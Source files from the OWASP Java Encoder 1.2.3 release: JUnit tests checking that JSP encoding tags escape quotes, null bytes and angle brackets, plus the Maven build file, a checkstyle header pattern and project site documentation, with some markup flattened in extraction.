package org.owasp.encoder.tag; /** * Simple tests for the ForJavaScriptBlockTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptBlockTagTest extends EncodingTagTest { public ForJavaScriptBlockTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForJavaScriptBlockTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForJavaScriptBlockTag instance = new ForJavaScriptBlockTag(); String value = "'\"\0"; String expected = "\\'\\\"\\x00"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java000066400000000000000000000053651375203724500326550ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. 
// // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForJavaScriptSourceTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptSourceTagTest extends EncodingTagTest { public ForJavaScriptSourceTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForJavaScriptSourceTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. 
*/ public void testDoTag() throws Exception { System.out.println("doTag"); ForJavaScriptSourceTag instance = new ForJavaScriptSourceTag(); String value = "\0'\""; String expected = "\\x00\\'\\\""; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java000066400000000000000000000023361375203724500314670ustar00rootroot00000000000000/* * To change this template, choose Tools | Templates * and open the template in the editor. */ package org.owasp.encoder.tag; /** * Simple tests for the ForJavaScriptTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptTagTest extends EncodingTagTest { public ForJavaScriptTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForJavaScriptTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForJavaScriptTag instance = new ForJavaScriptTag(); String value = "\0'\""; String expected = "\\x00\\x27\\x22"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java000066400000000000000000000053461375203724500320470ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. 
// ... (BSD 3-Clause license header, identical to LICENSE)

package org.owasp.encoder.tag;

/**
 * Simple tests for the ForUriComponentTag.
 *
 * @author Jeremy Long (jeremy.long@gmail.com)
 */
public class ForUriComponentTagTest extends EncodingTagTest {

    public ForUriComponentTagTest(String testName) {
        super(testName);
    }

    @Override
    protected void setUp() throws Exception {
        super.setUp();
    }

    @Override
    protected void tearDown() throws Exception {
        super.tearDown();
    }

    /**
     * Test of doTag method, of class ForUriComponentTag.
     * This is a very simple test that doesn't fully
     * exercise/test the encoder - only that the
     * tag itself works.
     * @throws Exception is thrown if the tag fails.
     */
    public void testDoTag() throws Exception {
        System.out.println("doTag");
        ForUriComponentTag instance = new ForUriComponentTag();
        // Restored: the flattened dump showed "&=test", but only "&amp;=test"
        // URI-component-encodes to the expected value below.
        String value = "&amp;=test";
        String expected = "%26amp%3B%3Dtest";
        instance.setJspContext(_pageContext);
        instance.setValue(value);
        instance.doTag();
        String results = _response.getContentAsString();
        assertEquals(expected, results);
    }
}

owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java

// Copyright (c) 2012 Jeff Ichnowski
// All rights reserved.
// ... (BSD 3-Clause license header, identical to LICENSE)

package org.owasp.encoder.tag;

/**
 * Simple tests for the ForUriTag.
 *
 * @author Jeremy Long (jeremy.long@gmail.com)
 */
public class ForUriTagTest extends EncodingTagTest {

    public ForUriTagTest(String testName) {
        super(testName);
    }

    @Override
    protected void setUp() throws Exception {
        super.setUp();
    }

    @Override
    protected void tearDown() throws Exception {
        super.tearDown();
    }

    /**
     * Test of doTag method, of class ForUriTag.
     * This is a very simple test that doesn't fully
     * exercise/test the encoder - only that the
     * tag itself works.
     * @throws Exception is thrown if the tag fails.
     */
    public void testDoTag() throws Exception {
        System.out.println("doTag");
        ForUriTag instance = new ForUriTag();
        String value = "\\\"";
        String expected = "%5C%22";
        instance.setJspContext(_pageContext);
        instance.setValue(value);
        instance.doTag();
        String results = _response.getContentAsString();
        assertEquals(expected, results);
    }
}

owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java

// Copyright (c) 2012 Jeff Ichnowski
// All rights reserved.
// ... (BSD 3-Clause license header, identical to LICENSE)

package org.owasp.encoder.tag;

/**
 * Simple tests for the ForXmlAttributeTag.
 *
 * @author Jeremy Long (jeremy.long@gmail.com)
 */
public class ForXmlAttributeTagTest extends EncodingTagTest {

    public ForXmlAttributeTagTest(String testName) {
        super(testName);
    }

    @Override
    protected void setUp() throws Exception {
        super.setUp();
    }

    @Override
    protected void tearDown() throws Exception {
        super.tearDown();
    }

    /**
     * Test of doTag method, of class ForXmlAttributeTag.
     * This is a very simple test that doesn't fully
     * exercise/test the encoder - only that the
     * tag itself works.
     * @throws Exception is thrown if the tag fails.
     */
    public void testDoTag() throws Exception {
        System.out.println("doTag");
        ForXmlAttributeTag instance = new ForXmlAttributeTag();
        // Restored: the flattened dump stripped this tag-like literal and
        // showed the expected value in its entity-decoded form "<div>".
        String value = "<div>";
        String expected = "&lt;div&gt;";
        instance.setJspContext(_pageContext);
        instance.setValue(value);
        instance.doTag();
        String results = _response.getContentAsString();
        assertEquals(expected, results);
    }
}

owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java

// Copyright (c) 2012 Jeff Ichnowski
// All rights reserved.
// ... (BSD 3-Clause license header, identical to LICENSE)
package org.owasp.encoder.tag;

/**
 * Simple tests for the ForXmlCommentTag.
 *
 * @author Jeremy Long (jeremy.long@gmail.com)
 */
public class ForXmlCommentTagTest extends EncodingTagTest {

    public ForXmlCommentTagTest(String testName) {
        super(testName);
    }

    @Override
    protected void setUp() throws Exception {
        super.setUp();
    }

    @Override
    protected void tearDown() throws Exception {
        super.tearDown();
    }

    /**
     * Test of doTag method, of class ForXmlCommentTag.
     * This is a very simple test that doesn't fully
     * exercise/test the encoder - only that the
     * tag itself works.
     * @throws Exception is thrown if the tag fails.
     */
    public void testDoTag() throws Exception {
        System.out.println("doTag");
        ForXmlCommentTag instance = new ForXmlCommentTag();
        String value = "-->

owasp-java-encoder-1.2.3/pom.xml

<!-- root pom.xml: element names restored from the flattened dump -->
<project>
    <modelVersion>4.0.0</modelVersion>
    <groupId>org.owasp.encoder</groupId>
    <artifactId>encoder-parent</artifactId>
    <version>1.2.3</version>
    <packaging>pom</packaging>
    <name>OWASP Java Encoder Project</name>
    <description>The OWASP Encoders package is a collection of high-performance low-overhead contextual encoders, that when utilized correctly, is an effective tool in preventing Web Application security vulnerabilities such as Cross-Site Scripting.</description>
    <modules>
        <module>core</module>
        <module>jsp</module>
        <module>esapi</module>
    </modules>
    <url>https://www.owasp.org/index.php/OWASP_Java_Encoder_Project</url>
    <inceptionYear>2011</inceptionYear>
    <organization>
        <name>OWASP (Open Web-Application Security Project)</name>
        <url>https://www.owasp.org/</url>
    </organization>
    <licenses>
        <license>
            <name>The BSD 3-Clause License</name>
            <url>http://www.opensource.org/licenses/BSD-3-Clause</url>
            <distribution>repo</distribution>
        </license>
    </licenses>
    <parent>
        <groupId>org.sonatype.oss</groupId>
        <artifactId>oss-parent</artifactId>
        <version>9</version>
    </parent>
    <scm>
        <connection>scm:git:git@github.com:owasp/owasp-java-encoder.git</connection>
        <developerConnection>scm:git:git@github.com:owasp/owasp-java-encoder.git</developerConnection>
        <url>https://github.com/owasp/owasp-java-encoder</url>
    </scm>
    <distributionManagement>
        <site>
            <id>gh-pages</id>
            <name>gh-pages</name>
            <url>http://owasp.github.io/owasp-java-encoder</url>
        </site>
    </distributionManagement>
    <mailingLists>
        <mailingList>
            <name>Owasp-java-encoder-project</name>
            <subscribe>https://lists.owasp.org/mailman/listinfo/owasp-java-encoder-project</subscribe>
            <unsubscribe>https://lists.owasp.org/mailman/listinfo/owasp-java-encoder-project</unsubscribe>
            <post>owasp-java-encoder-project@lists.owasp.org</post>
            <archive>http://lists.owasp.org/pipermail/owasp-java-encoder-project/</archive>
        </mailingList>
    </mailingLists>
    <issueManagement>
        <system>github</system>
        <url>https://github.com/owasp/owasp-java-encoder/issues</url>
    </issueManagement>
    <developers>
        <developer>
            <name>Jeff Ichnowski</name>
            <roles>
                <role>Project Owner</role>
                <role>Architect</role>
                <role>Developer</role>
            </roles>
        </developer>
        <developer>
            <name>Jim Manico</name>
            <organization>OWASP</organization>
            <organizationUrl>https://www.owasp.org/</organizationUrl>
            <roles>
                <role>Architect</role>
                <role>Developer</role>
            </roles>
        </developer>
        <developer>
            <name>Jeremy Long</name>
            <email>jeremy.long@owasp.org</email>
            <organization>OWASP</organization>
            <organizationUrl>https://www.owasp.org/</organizationUrl>
            <roles>
                <role>developer</role>
            </roles>
        </developer>
    </developers>
    <properties>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
        <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
    </properties>
    <dependencyManagement>
        <dependencies>
            <dependency>
                <groupId>junit</groupId>
                <artifactId>junit</artifactId>
                <version>3.8.2</version>
            </dependency>
        </dependencies>
    </dependencyManagement>
    <dependencies>
        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <scope>test</scope>
        </dependency>
    </dependencies>
    <build>
        <pluginManagement>
            <plugins>
                <plugin>
                    <groupId>org.apache.maven.plugins</groupId>
                    <artifactId>maven-compiler-plugin</artifactId>
                    <version>3.5.1</version>
                </plugin>
                <plugin>
                    <groupId>org.apache.maven.plugins</groupId>
                    <artifactId>maven-jar-plugin</artifactId>
                    <version>3.0.2</version>
                </plugin>
                <plugin>
                    <groupId>org.apache.maven.plugins</groupId>
                    <artifactId>maven-source-plugin</artifactId>
                    <version>3.0.1</version>
                </plugin>
                <plugin>
                    <groupId>org.apache.maven.plugins</groupId>
                    <artifactId>maven-javadoc-plugin</artifactId>
                    <version>2.10.4</version>
                </plugin>
                <plugin>
                    <groupId>org.codehaus.mojo</groupId>
                    <artifactId>cobertura-maven-plugin</artifactId>
                    <version>2.6</version>
                </plugin>
                <plugin>
                    <groupId>org.apache.maven.plugins</groupId>
                    <artifactId>maven-failsafe-plugin</artifactId>
                    <version>2.19.1</version>
                </plugin>
                <plugin>
                    <groupId>org.apache.maven.plugins</groupId>
                    <artifactId>maven-surefire-plugin</artifactId>
                    <version>2.19.1</version>
                </plugin>
                <plugin>
                    <groupId>org.apache.maven.plugins</groupId>
                    <artifactId>maven-surefire-report-plugin</artifactId>
                    <version>2.19.1</version>
                </plugin>
                <plugin>
                    <groupId>org.apache.maven.plugins</groupId>
                    <artifactId>maven-gpg-plugin</artifactId>
                    <version>1.6</version>
                </plugin>
                <plugin>
                    <groupId>org.apache.maven.plugins</groupId>
                    <artifactId>maven-site-plugin</artifactId>
                    <version>3.4</version>
                    <dependencies>
                        <dependency>
                            <groupId>lt.velykis.maven.skins</groupId>
                            <artifactId>reflow-velocity-tools</artifactId>
                            <version>1.1.1</version>
                        </dependency>
                        <dependency>
                            <groupId>org.apache.velocity</groupId>
                            <artifactId>velocity</artifactId>
                            <version>1.7</version>
                        </dependency>
                        <dependency>
                            <groupId>org.apache.maven.doxia</groupId>
                            <artifactId>doxia-module-markdown</artifactId>
                            <version>1.6</version>
                        </dependency>
                    </dependencies>
                </plugin>
                <plugin>
                    <groupId>org.apache.maven.plugins</groupId>
                    <artifactId>maven-project-info-reports-plugin</artifactId>
                    <version>2.9</version>
                </plugin>
                <plugin>
                    <groupId>org.apache.maven.plugins</groupId>
                    <artifactId>maven-pmd-plugin</artifactId>
                    <version>3.6</version>
                </plugin>
                <plugin>
                    <groupId>org.apache.felix</groupId>
                    <artifactId>maven-bundle-plugin</artifactId>
                    <version>3.3.0</version>
                </plugin>
                <plugin>
                    <groupId>org.codehaus.mojo</groupId>
                    <artifactId>versions-maven-plugin</artifactId>
                    <version>2.3</version>
                </plugin>
                <plugin>
                    <groupId>org.apache.maven.plugins</groupId>
                    <artifactId>maven-jxr-plugin</artifactId>
                    <version>2.5</version>
                </plugin>
                <plugin>
                    <groupId>org.codehaus.mojo</groupId>
                    <artifactId>findbugs-maven-plugin</artifactId>
                    <version>3.0.4</version>
                </plugin>
            </plugins>
        </pluginManagement>
        <plugins>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <configuration>
                    <source>1.5</source>
                    <target>1.5</target>
                </configuration>
            </plugin>
            <plugin>
                <groupId>org.apache.felix</groupId>
                <artifactId>maven-bundle-plugin</artifactId>
                <executions>
                    <execution>
                        <id>default-bundle</id>
                        <phase>process-classes</phase>
                        <goals>
                            <goal>manifest</goal>
                        </goals>
                        <configuration>
                            <supportIncrementalBuild>true</supportIncrementalBuild>
                            <instructions>
                                <_noee>true</_noee>
                                <_nouses>true</_nouses>
                            </instructions>
                        </configuration>
                    </execution>
                </executions>
            </plugin>
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>cobertura-maven-plugin</artifactId>
                <configuration>
                    <check>
                        <branchRate>85</branchRate>
                        <lineRate>85</lineRate>
                        <haltOnFailure>false</haltOnFailure>
                        <totalBranchRate>85</totalBranchRate>
                        <totalLineRate>85</totalLineRate>
                        <packageLineRate>85</packageLineRate>
                        <packageBranchRate>85</packageBranchRate>
                    </check>
                </configuration>
                <executions>
                    <execution>
                        <goals>
                            <goal>clean</goal>
                        </goals>
                    </execution>
                </executions>
            </plugin>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-surefire-plugin</artifactId>
                <configuration>
                    <excludes>
                        <exclude>org/owasp/encoder/BenchmarkTest.java</exclude>
                    </excludes>
                    <argLine>-Xmx1024m -XX:MaxPermSize=256m</argLine>
                </configuration>
            </plugin>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-jar-plugin</artifactId>
                <executions>
                    <execution>
                        <id>default-jar</id>
                        <phase>package</phase>
                        <goals>
                            <goal>jar</goal>
                        </goals>
                        <configuration>
                            <forceCreation>true</forceCreation>
                            <archive>
                                <manifestFile>${project.build.outputDirectory}/META-INF/MANIFEST.MF</manifestFile>
                            </archive>
                        </configuration>
                    </execution>
                </executions>
            </plugin>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-source-plugin</artifactId>
                <executions>
                    <execution>
                        <id>attach-sources</id>
                        <phase>package</phase>
                        <goals>
                            <goal>jar</goal>
                        </goals>
                    </execution>
                </executions>
            </plugin>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-javadoc-plugin</artifactId>
                <executions>
                    <execution>
                        <id>attach-javadocs</id>
                        <phase>package</phase>
                        <goals>
                            <goal>jar</goal>
                        </goals>
                    </execution>
                </executions>
            </plugin>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-site-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
    <reporting>
        <plugins>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-project-info-reports-plugin</artifactId>
                <reportSets>
                    <reportSet>
                        <reports>
                            <report>index</report>
                            <report>summary</report>
                            <report>license</report>
                            <report>scm</report>
                            <report>mailing-list</report>
                            <report>issue-tracking</report>
                            <report>dependencies</report>
                            <report>plugin-management</report>
                            <report>project-team</report>
                        </reports>
                    </reportSet>
                </reportSets>
            </plugin>
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>versions-maven-plugin</artifactId>
                <reportSets>
                    <reportSet>
                        <reports>
                            <report>dependency-updates-report</report>
                            <report>plugin-updates-report</report>
                        </reports>
                    </reportSet>
                </reportSets>
            </plugin>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-jxr-plugin</artifactId>
            </plugin>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-surefire-report-plugin</artifactId>
                <reportSets>
                    <reportSet>
                        <reports>
                            <report>report-only</report>
                            <report>failsafe-report-only</report>
                        </reports>
                    </reportSet>
                </reportSets>
            </plugin>
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>cobertura-maven-plugin</artifactId>
            </plugin>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-pmd-plugin</artifactId>
                <configuration>
                    <targetJdk>1.5</targetJdk>
                    <linkXRef>true</linkXRef>
                    <sourceEncoding>utf-8</sourceEncoding>
                </configuration>
            </plugin>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-javadoc-plugin</artifactId>
                <reportSets>
                    <reportSet>
                        <id>default</id>
                        <reports>
                            <report>javadoc</report>
                        </reports>
                    </reportSet>
                </reportSets>
            </plugin>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-checkstyle-plugin</artifactId>
                <configuration>
                    <configLocation>src/main/config/checkstyle.xml</configLocation>
                    <headerLocation>src/main/config/checkstyle-header.txt</headerLocation>
                </configuration>
            </plugin>
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>findbugs-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </reporting>
    <profiles>
        <profile>
            <id>sign-artifacts</id>
            <activation>
                <property>
                    <name>performRelease</name>
                    <value>true</value>
                </property>
            </activation>
            <build>
                <plugins>
                    <plugin>
                        <groupId>org.apache.maven.plugins</groupId>
                        <artifactId>maven-gpg-plugin</artifactId>
                        <executions>
                            <execution>
                                <id>sign-artifacts</id>
                                <phase>verify</phase>
                                <goals>
                                    <goal>sign</goal>
                                </goals>
                            </execution>
                        </executions>
                    </plugin>
                </plugins>
            </build>
        </profile>
    </profiles>
</project>

owasp-java-encoder-1.2.3/src/main/config/checkstyle-header.txt

^// Copyright \(c\) 201[2-9] (Jeff Ichnowski|Jim Manico|Jeremy Long)\s*$
^// All rights reserved\.\s*$
^//
^// Redistribution and use in source and binary forms, with or without\s*$
^// modification, are permitted provided that the following conditions\s*$
^// are met:\s*$
^//\s*$
^// \* Redistributions of source code must retain the above\s*$
^// copyright notice, this list of conditions and the following\s*$
^// disclaimer\.\s*$
^//
^// \* Redistributions in binary form must reproduce the above\s*$
^// copyright notice, this list of conditions and the following\s*$
^// disclaimer in the documentation and/or other materials\s*$
^// provided with the distribution.\s*$
^//
^// \* Neither the name of the OWASP nor the names of its\s*$
^// contributors may be used to endorse or promote products\s*$
^// derived from this software without specific prior written\s*$
^// permission\.\s*$
^//
^// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\s*$
^// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\s*$
^// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\s*$
^// FOR A PARTICULAR PURPOSE ARE DISCLAIMED\. IN NO EVENT SHALL THE\s*$
^// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\s*$
^// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\s*$
^// \(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\s*$
^// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION\)\s*$
^// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\s*$
^// STRICT LIABILITY, OR TORT \(INCLUDING NEGLIGENCE OR OTHERWISE\)\s*$
^// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED\s*$
^// OF THE POSSIBILITY OF SUCH DAMAGE\.\s*$

owasp-java-encoder-1.2.3/src/main/config/checkstyle.xml

owasp-java-encoder-1.2.3/src/site/markdown/index.md

## OWASP Java Encoder Project

The OWASP Java Encoder Project is a collection of high-performance, low-overhead contextual encoders that, when used correctly, is an effective tool in preventing Web Application security vulnerabilities such as Cross-Site Scripting (XSS). Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) for more information on preventing XSS.

### Usage

In addition to the usage guidance below, more examples can be found on the [OWASP Java Encoder Project Wiki](https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project).

The JARs can be found in [Maven Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.owasp.encoder%22).

```xml
<dependency>
    <groupId>org.owasp.encoder</groupId>
    <artifactId>encoder</artifactId>
    <version>1.2.2</version>
</dependency>
```

Utilize the encoder:

```java
import org.owasp.encoder.Encode;
//...
PrintWriter out = ....;
out.println("");
```

### JSP Usage

The JSP Encoder makes using the Java Encoder within JSP simple via a TLD that provides tags and a set of JSP EL functions:

```xml
<dependency>
    <groupId>org.owasp.encoder</groupId>
    <artifactId>encoder-jsp</artifactId>
    <version>1.2.2</version>
</dependency>
```

```JSP
<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %>
<%-- ... --%>

    Dynamic data via EL: ${e:forHtml(param.value)}

    Dynamic data via tag:

```

owasp-java-encoder-1.2.3/src/site/resources/images/owasp.jpg (binary JPEG image, not reproduced)
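The Usage section above shows the API only in outline. The following is an added example, not the project's own code or documentation: it renders one untrusted value into four output contexts by picking the `Encode` method for each context, and checks the encoder directly against two values that the JSP tag tests earlier on this page assert. It assumes `org.owasp.encoder:encoder` on the classpath; the input string is constructed.

```java
import org.owasp.encoder.Encode;

/**
 * Contextual output encoding with the OWASP Java Encoder (added example,
 * not part of the project). The same untrusted value is placed in element
 * content, a quoted attribute, a URL inside an attribute, and a JavaScript
 * string; each placement uses the encoder for that context.
 */
public class ContextualEncodingExample {

    /** Builds an HTML fragment that embeds {@code untrusted} in four contexts. */
    public static String render(String untrusted) {
        StringBuilder html = new StringBuilder();

        // 1. Element content.
        html.append("<p>Hello, ").append(Encode.forHtml(untrusted)).append("</p>\n");

        // 2. Quoted attribute value; the surrounding quotes come from the template.
        html.append("<input type=\"text\" value=\"")
            .append(Encode.forHtmlAttribute(untrusted)).append("\">\n");

        // 3. Query-string parameter inside an href: two nested contexts, so
        //    URI-component encoding first, then HTML-attribute encoding of the
        //    whole attribute value.
        String query = "q=" + Encode.forUriComponent(untrusted);
        html.append("<a href=\"/search?")
            .append(Encode.forHtmlAttribute(query)).append("\">search</a>\n");

        // 4. JavaScript string literal inside a script block.
        html.append("<script>var name = '")
            .append(Encode.forJavaScript(untrusted)).append("';</script>\n");

        return html.toString();
    }

    /** Fails fast when the encoder does not produce the value the tag tests expect. */
    private static void check(String actual, String expected) {
        if (!expected.equals(actual)) {
            throw new AssertionError("expected " + expected + " but got " + actual);
        }
    }

    public static void main(String[] args) {
        // Constructed sample input with characters significant in every context above.
        String untrusted = "Tom & \"Jerry\" <b>";
        System.out.println(render(untrusted));

        // The values asserted by ForUriComponentTagTest and ForUriTagTest on this
        // page, checked here against the core encoder rather than the JSP tag.
        check(Encode.forUriComponent("&amp;=test"), "%26amp%3B%3Dtest");
        check(Encode.forUri("\\\""), "%5C%22");
    }
}
```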
owasp-java-encoder-1.2.3/src/site/site.xml

lt.velykis.maven.skins reflow-maven-skin 1.1.1 OWASP Java Encoder Project OWASP Java Encoder Project OWASP Java Encoder Project ./images/owasp.jpg 107 300 default true github ${project.name} https://www.owasp.org/index.php/OWASP_Java_Encoder_Project false top 6 Modules|Maven Documentation Modules Contribute Maven Documentation